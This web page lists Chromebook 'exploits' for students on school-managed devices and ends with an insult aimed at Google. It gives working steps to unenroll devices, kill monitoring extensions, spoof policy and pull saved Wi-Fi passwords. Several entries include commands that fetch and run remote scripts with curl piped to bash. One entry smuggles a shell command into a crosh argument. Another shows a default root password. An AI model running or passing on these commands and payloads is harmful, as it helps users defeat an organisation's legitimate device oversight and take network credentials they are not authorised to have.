5: Once you're on the normal district login screen, press Ctrl+Alt+F2.
6: Type "root" as the login & "test0000" as the password if needed.
7: Run the command "vpd -i RW_VPD -s check_enrollment=0", then press Ctrl+Alt+F1.
8: Open the kiosk app.
9: Once you're done, reboot your computer with Power+Refresh, then follow the instructions.
AnyOSDevMode;ExternalStorageDeviceShimboot
Requires a storage device, Dev Mode; not compatable with ARM Chromebooks
Allows you to boot Linux or Chrome OS from an external storage device without modifying your Chromebook.
Chrome OS-based exploit.
Shimboot.mp4
1: Find your Chromebook’s board name by going to chrome://version, it will be behind “stable-channel”.
2: Get your Chromebook’s RMA shim from chrome100.dev & run the commands below or download a prebuilt one here.
3: Flash it onto an external storage device.
4: Enable Dev Mode & then plug in the storage device & reenter Recovery Mode (Esc+Refresh+Power).
5: Boot into Linux & log in. The default is user/user.
6: Expand the rootfs partition so that it fills up the entire disk by running "sudo growpart /dev/sdX 4" (replacing sdX with the block device corresponding to your disk) to expand the partition, then run "sudo resize2fs /dev/sdX4" to expand the filesystem.
AnyWebExtensionCodeExecution;chrome://flagsSh0vel
1: Get code execution in an extension. This extension will need to have the "tabs", "activeTab", & "browserAction" permissions as well as 'unsafe-eval' set in the CSP.
2: Enable the flag "#extensions-on-chrome-urls".
3: Get a bookmarklet & place it as follows: chrome.browserAction.onClicked.addListener(() => {chrome.tabs.executeScript(null, {code: `location.href="javascript:bookmarklet";`});});
4: Open the URL you want this code to run on & click the extension icon.
AnyWebDevMode;ExtensionDevModeSkebstore
Requires extension Developer Mode
An extension that allows you to download other extensions.
Web-based exploit.
Skebstore.mp4
1: Download the folder from the GitHub page or here.
2: Go to chrome://extensions & enable extension Developer Mode.
3: Click "Load unpacked" & select the folder (unzip it if needed).
4: Click the extension to go to the Skebstore install page.
5: Insert an extension's ID & download it.
AnyWebSnap&ReadSnap&Run
2: Enable the Snap&Read toolbar.
3: Enter any text into the outline topic's editable text area.
4: Click the bullet point of the topic.
5: Click the "Link to Source" option.
6: Click the "+" button at the bottom right.
7: Switch to the website tab.
8: In the Article/Page title input field, enter the name of your chosen bookmarklet.
9: Click "Save" & switch to the outline tab.
10: In the Snap&Read toolbar, click the "Hide Outlines" button.
Execution:
11: In the Snap&Read toolbar, click the "Show Outlines" button.
12: In your created outline, click the link separated by parenthesis that contains the bookmarklet.
13: Click the "Hide Outlines" button.
AnyWebSourceCodeSource View
Requires the ability to view a page’s source code
Reconstructs a web page from its source code.
Web-based "exploit".
1: Go to a website & view its source code with Ctrl+U or by using the View Source bookmarklet.
2: Copy everything from the newly opened tab & paste it in a site like this. AnyWebSync Internals Password Extractor
Requires a CAUB'd Wi-Fi network
Find the Wi-Fi password for CAUB'd Wi-Fi networks.
Web-based exploit.
SIPE.mp4
1: CAUB the Wi-Fi network you want to get the password from.
2: Go here & type the name of the Wi-Fi network.
3: Click the majik (TM) button, it will tell you what you'll need to press in step 6.
4: Go to chrome://sync-internals/ in a new tab & click the "Search" tab.
5: Type "Wi-Fi_" in the textbox & click "Search".
6: Click the name of the Wi-Fi you got from step 3 & copy all the data. Note that it might be a longer string than what it says on SIPE.
7: Go back to SIPE & paste the data in the textbox, then click the majik button (TM).
AnyWebCrosh;ExtensionDevModeTr3nch
Requires Sh0vel, Extension Dev Mode, Crosh; patched on Chrome OS 127+
Run scripts in Chrome pages.
Web-based exploit.
1: Enter a kiosk profile with SKIOVOX.
2: Download the ZIP from here.
3: Navigate to chrome://extensions & enable Extension Dev Mode, then load the extension.
4: Navigate to chrome-untrusted://crosh & run "vmc create-extra-disk --size=1 /home/chronos/user/MyFiles/Downloads/opener.txt". It should return "A raw disk is created at /home/chronos/user/MyFiles/Downloads/opener.txt."
5: Open a new tab. If the default New Tab page loads, install the SKIOVOX Helper extension in a new tab before proceeding.
6: Click the folder icon in the bottom right. The file manager should open. Navigate to "Downloads".
7: Open the opener.txt file. A new window should open with a blank page tab. This window is managed by your organization.
8: Open a new tab & close the blank page tab.
9: Navigate to chrome://extensions & open the details page of the extension you previously chose to install in your managed profile. Copy its extension ID.
10: Return to the regular window that is not managed by your organization.
11: Activate the Skiovox Breakout extension.
12: In the input field for the extension ID, enter the ID of the extension you previously chose to install in your managed profile.
13: Set the textarea text to the script you want to run.
14: Click Start injection.
Loading the Tr3nch Menu:
1: Navigate to chrome://flags & enable the "extensions-on-chrome-urls" flag.
2: Click "Restart" then navigate to chrome://os-settings, chrome://setttings, chrome://extensions, chrome://chrome-signin, chrome://inspect, chrome://file-manager, chrome://network, or chrome://oobe.
3: Click the extensions extension icon in the toolbar.
4: Click & activate the extension with the injected script. The Tr3nch menu should launch.
AnyWebuBlockOriginuBlock Run
uBlock Origin exclusive
Unblocks bookmarklets. Older version of uRun.
Web-based exploit.
1: Go to uBlock Origin’s settings page & check the “I am an advanced user” box, then click on the small cog icon.
2: Find “userResourcesLocation unset" & change it from "unset" to "https://raw.githubusercontent.com/3kh0/ext-remover/main/ublockExec.js".
3: Go to the “My filters” tab & add a line with “*##+js(execute_script.js)”, then run the code on the current page (Ctrl+Alt+~).
The only reason to use this is for Securely-Kill.
AnyOSDevModeUSBoot
Requires Dev Mode
Allows you to boot from a USB device.
USBoot.mp4
1: Enable Dev Mode (Esc+Power+Refresh).
2: After selecting "boot from internal disk", press Ctrl+Alt+F2.
3: Type "sudo crossystem dev_boot_usb=1".
Press "Ctrl+U" on the OS Verification screen to boot from USB.
AnyWebuBlockOriginuRun
uBlock Origin exclusive
Unblocks bookmarklets. Updated version of uBlock Run.
Web-based exploit.
uRun.mp4
1: Go to uBlock Origin’s settings page & check the “I am an advanced user” box, then click on the small cog icon.
2: Find “userResourcesLocation unset" & change it to "https://inglan2.github.io/uRun/urun.js".
3: Go to the “My filters” tab & add a line with “*##+js(urun.js)”, then run the code on the current page (Ctrl+Alt+~).
Press "Ctrl+Shift+`" to open the menu, where you can run & create scripts. To add a script, click the ➕ button & enter the code without the "javascript:" part.
AnyWebchrome://net-export;chrome://network;chrome://policyPolicy Password Tool
Only works with connected networks; Chrome OS exclusive
Gives the passwords to connected Wi-Fi networks from a .json file.
Web-based exploit.
PPT.mp4
1: Go to chrome://net-export.
2: Select "Include raw bytes" & start logging to disk.
3: Go to chrome://policy.
4: Click "Reload policies".
5: Go back to chrome://net-export & stop logging.
6: Go here or open this HTML file & upload the log file.
Crosh AnyCrosh;DevModeCroshFi
Requires Dev Mode
Gives you the password to a Wi-Fi network.
1: Enter Dev Mode & open Crosh (Ctrl+Alt+T).
2: Run the commands "shell", "sudo su", & "cd home/root", then type "ls" & copy the middle code string.
3: Run the command "cd [code string here]" & type "ls" again. Enter "more shill/shill.profile".
4: Enter "more shill/shill.profile".
5: Eventually, you’ll see a username appear. Scroll up in Crosh until you see the SSID (network ID). Copy the passphrase code (below the SSID & after the colon).
6: Run the command "echo [passphrase] | tr ‘!-~’ ‘P-~!-O’."
100CroshDe-roll
Patched on Chrome OS 101+
Unenrolls your Chromebook using Crosh.
Unenroll:
1: Open Crosh (Ctrl+Alt+T).
2: Run "set_cellular_ppp \';dbus-send${IFS}--system${IFS}--print-reply${IFS}--dest=org.chromium.SessionManager${IFS}/org/chromium/SessionManager${IFS}org.chromium.SessionManagerInterface.ClearForcedReEnrollmentVpd;exit;\'"
3: Powerwash your Chromebook (Ctrl+Alt+Shift+R).
4: Enable "MAC Address Randomization" in chrome://flags to cloak yourself.
Re-enroll:
1: Open a bash shell & run "sudo -i", "vpd -i RW_VPD -s check_enrollment=1", "echo "fast safe" > /mnt/stateful_partition/factory_install_reset", & "reboot".
116Crosh;DevMode;RecoveryModeFakemurk
Requires Dev Mode; patched on version 117+; patched on kernver 4+
Allows you to have Dev Mode permissions while in Safe Mode.
1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the number ends in 4+, your Chromebook is unsupported.
4: Enter Dev Mode.
3: Flash Linux to an external storage device.
4: Install RW_LEGACY bios from here.
5: Boot into Linux.
6: Go to chrome-untrusted://crosh & run the commands "shell", “sudo -i”, & “bash <(curl -SLk https://github.com/MercuryWorkshop/fakemurk/releases/latest/download/fakemurk.sh)”. Follow everything it says. If you get an error about a filesystem being readonly, run “fsck -f $(rootdev)” & reboot.
If you get stuck on the enrollment screen, enter Dev Mode with Ctrl+D, then press Refresh+Power & then press space on the OS verification screen. You will be on a “Chrome OS is missing or damaged” screen. Press Esc+Refresh+Power then Ctrl+D & enter. When you get back to the OS verification screen, press Ctrl+D to boot.
Don't use the sign out button as it will freeze your computer. Use Power+Refresh or Reboot in Crosh instead.
Mush will be installed with Fakemurk.
While Fakemurk is installed, you can make a folder called “disable-extensions” to disable extensions.
AnyCroshK1LL3R SP1D3R
Requires Chronos access
Kills all extensions.
1: Run "while true; do kill -9 $(pgrep -f "\-\-extension\-process"); done".
AnyCrosh;PowerwashOP Crosh
Requires powerwash
Deletes the extensions.
1: Open Crosh (Ctrl+Alt+T) & run the “vmc” command. If you get a list of subcommands, then continue.
2: Powerwash then sign in & disable Wi-Fi immediately.
3: Go to chrome://extensions & enable your internet, then immediately disable it when an extension is installed.
4: Open Crosh & for each extension you want to disable, run the command “vmc create-extra-disk --size 1 /home/chronos/user/Extensions/{extensionID}” or run "Open Crosh & type “vmc create-extra-disk --size 1 /home/chronos/user/Extensions”" to disable all.
5: Reenable Wi-Fi.
130Crosh;DevModePollen
Requires Dev Mode; patched on Chrome OS 131+
Changes your Chromebook's policy.
Chrome OS-based exploit.
1: Enter Dev Mode (Esc+Power+Refresh) & open Crosh (Ctrl+Alt+T).
2: Run the following commands: “shell”, “sudo su”, & “curl -Ls https://mercuryworkshop.github.io/Pollen/Pollen.sh | bash”.
A: If the policy doesn’t apply, press Alt+Vol Up+X.
3: Reboot, repeat steps 1 & 2, then run this command: "curl -Ls https://mercuryworkshop.github.io/Pollen/PollenFS.sh | bash".
Created by The Wagonization, consisting of JackWagon885
All credit goes to the respective owners. I only compile them in a list.
Fuck you Google
